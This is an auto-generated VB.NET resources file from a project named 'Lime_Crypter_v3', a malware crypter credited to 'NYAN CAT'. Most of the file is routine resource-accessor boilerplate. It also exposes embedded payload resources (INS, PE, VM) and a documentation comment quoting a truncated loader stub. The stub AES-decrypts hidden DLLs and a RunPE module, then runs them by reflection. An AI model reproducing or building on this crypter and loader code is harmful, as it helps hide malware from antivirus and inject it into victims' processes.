'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Lime_Crypter_v3.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property INS() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("INS", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &apos;******* https://github.com/NYAN-x-CAT
        '''&apos;******* Credit to NYAN CAT
        '''
        '''Public Class Main
        '''
        '''    Public Shared Sub Main()
        '''
        '''        _Voker1(_Method(_Type(_Load(AES.Decrypter(_Resource(&quot;#VMDLL&quot;))), &quot;Main.Main&quot;), &quot;Main&quot;))
        '''
        '''        _Voker1(_Method(_Type(_Load(AES.Decrypter(_Resource(&quot;#INSDLL&quot;))), &quot;Main.Main&quot;), &quot;Main&quot;))
        '''
        '''        _Voker2(_Method(_Type(_Load(AES.Decrypter(_Resource(&quot;#RunPE&quot;))), &quot;PE.Main&quot;), &quot;ST&quot;))
        '''
        '''    End Sub
        '''
        '''    Public Shared Function _Load(ByVal F As Object)
        '''        Return Reflection. [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Loader() As String
            Get
                Return ResourceManager.GetString("Loader", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property nyan() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("nyan", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property PE() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("PE", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property VM() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("VM", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
    End Module
End Namespace
